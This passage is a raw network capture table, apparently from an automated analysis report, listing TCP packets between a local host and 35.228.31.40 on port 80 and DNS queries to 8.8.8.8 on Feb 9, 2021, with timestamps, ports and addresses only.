Feb 9, 2021 18:44:02.753813982 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.754503965 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.790873051 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.790913105 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.790934086 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.790951967 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.790971041 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.790991068 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.791012049 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.791030884 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.791053057 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.791050911 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.791109085 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.791115046 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.792597055 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.792632103 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.792762041 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.794924021 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.796870947 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.828629017 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828660965 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828685045 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828707933 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828731060 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828753948 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828766108 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.828779936 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828809977 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.828861952 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.828872919 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.829725027 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.865365028 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865423918 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865449905 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865473032 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865494013 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865514040 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865535975 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865557909 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865556955 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.865577936 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865611076 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865633965 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865637064 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.865658045 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865663052 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.865680933 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865684986 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.865708113 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.865736961 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.865822077 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.872245073 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872277021 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872297049 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872315884 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872334957 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872353077 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872360945 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.872376919 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872404099 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872411966 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.872430086 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872436047 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.872456074 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.872468948 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.872487068 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.872697115 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.902956009 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.902992010 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903014898 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903038025 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903059959 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903075933 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.903084040 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903106928 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903130054 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903148890 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.903156996 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.903175116 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.903398037 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.940150023 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940186024 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940206051 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940221071 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940237999 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940253973 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940268993 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940284967 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940299988 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940320015 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940320015 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.940337896 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940355062 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940363884 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.940370083 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.940396070 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.942358971 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.950129986 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950156927 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950171947 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950189114 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950206995 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950226068 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950299978 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.950462103 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950480938 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950496912 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.950500011 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950515032 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950529099 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950545073 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.950571060 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.950602055 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.951102018 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.953286886 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.953306913 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.953320980 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.953335047 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.953349113 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.953572989 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.963646889 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.963815928 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.978863955 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.979136944 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.989995956 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990025043 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990046978 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990073919 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990098953 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990120888 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990134954 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.990187883 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990211964 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990216017 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.990235090 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990242958 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.990262985 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990286112 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.990288973 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990291119 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.990313053 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.990314960 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.991986990 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.992012024 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.992026091 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.992034912 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.992077112 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.992100954 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.992341042 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.992491007 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.992625952 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.003705025 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.004147053 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.016552925 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.023750067 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.029957056 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030010939 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030050993 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030090094 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030092001 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.030137062 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030158997 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.030183077 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030220985 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030258894 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030286074 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.030297995 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030334949 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030374050 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030411005 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.030441046 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.030448914 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.030606031 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.032728910 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.032759905 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.032785892 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.032812119 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.032896996 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.033066988 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.033067942 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.036305904 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.039833069 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.040085077 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.053450108 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.056684971 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.069681883 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069720984 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069745064 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069770098 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069792032 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069814920 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069839954 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069864035 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069890022 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069904089 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.069911957 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069937944 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069940090 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.069961071 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.069962025 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.069984913 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.070130110 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.072058916 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072091103 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072112083 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072134018 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072156906 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072168112 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.072182894 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072206020 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.072208881 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.072282076 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.072293997 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.078336000 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.078550100 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.083209038 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.083244085 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.083266020 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.083291054 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.083383083 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.083422899 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.098020077 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.098175049 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.109443903 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.109509945 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.109538078 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.109559059 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.109585047 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.109611988 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.109647036 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.110358000 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.110399961 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.111068964 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.111843109 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.111872911 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.111896038 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.111917973 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.111939907 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.111963987 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.111995935 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.112066984 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.112122059 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.112148046 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.112170935 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.112190962 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.112200975 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.112215996 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.112221003 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.112245083 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.114218950 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.114263058 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.115187883 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.130875111 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.132131100 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.148924112 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.148950100 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.148964882 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.148983955 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.149002075 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.149017096 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.149038076 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.149440050 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151148081 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151165962 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151179075 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151196957 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151273966 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151278973 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151298046 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151307106 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151314020 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151330948 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151340008 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151350021 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151366949 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151374102 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151384115 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151400089 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151407957 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151417017 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151432991 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151441097 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151483059 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151488066 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.151681900 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.151699066 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.153278112 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.155585051 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.194701910 CET	49758	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.231704950 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.299371958 CET	80	49758	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:03.299474955 CET	49758	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.299907923 CET	49758	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:03.377346992 CET	80	49758	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:04.254025936 CET	49759	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.254082918 CET	49760	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.330491066 CET	80	49759	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:04.330662966 CET	49759	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.330867052 CET	49759	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.333026886 CET	80	49760	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:04.333142042 CET	49760	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.447323084 CET	80	49759	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:04.711205959 CET	80	49759	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:04.711227894 CET	80	49759	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:04.711282969 CET	49759	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.711317062 CET	49759	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.712994099 CET	49759	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:04.787381887 CET	80	49759	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:05.783018112 CET	49760	80	192.168.2.6	35.228.31.40

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2021 18:41:28.503180027 CET	56023	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:28.554065943 CET	53	56023	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:29.436470032 CET	58384	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:29.487951040 CET	53	58384	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:30.384464979 CET	60261	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:30.444377899 CET	53	60261	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:31.674437046 CET	56061	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:31.725266933 CET	53	56061	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:33.007389069 CET	58336	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:33.058994055 CET	53	58336	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:36.943169117 CET	53781	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:36.991944075 CET	53	53781	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:39.044589996 CET	54064	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:39.093472004 CET	53	54064	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:40.322514057 CET	52811	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:40.392273903 CET	53	52811	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:40.402009964 CET	55299	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:40.453510046 CET	53	55299	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:40.869976044 CET	63745	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:40.928534031 CET	53	63745	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:41.876198053 CET	63745	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:41.941788912 CET	53	63745	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:42.891485929 CET	63745	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:42.947746038 CET	50055	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:43.001004934 CET	53	50055	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:43.034580946 CET	53	63745	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:44.907017946 CET	63745	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:44.963862896 CET	53	63745	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:48.799129009 CET	61374	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:48.922972918 CET	63745	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:48.980077982 CET	53	63745	8.8.8.8	192.168.2.6
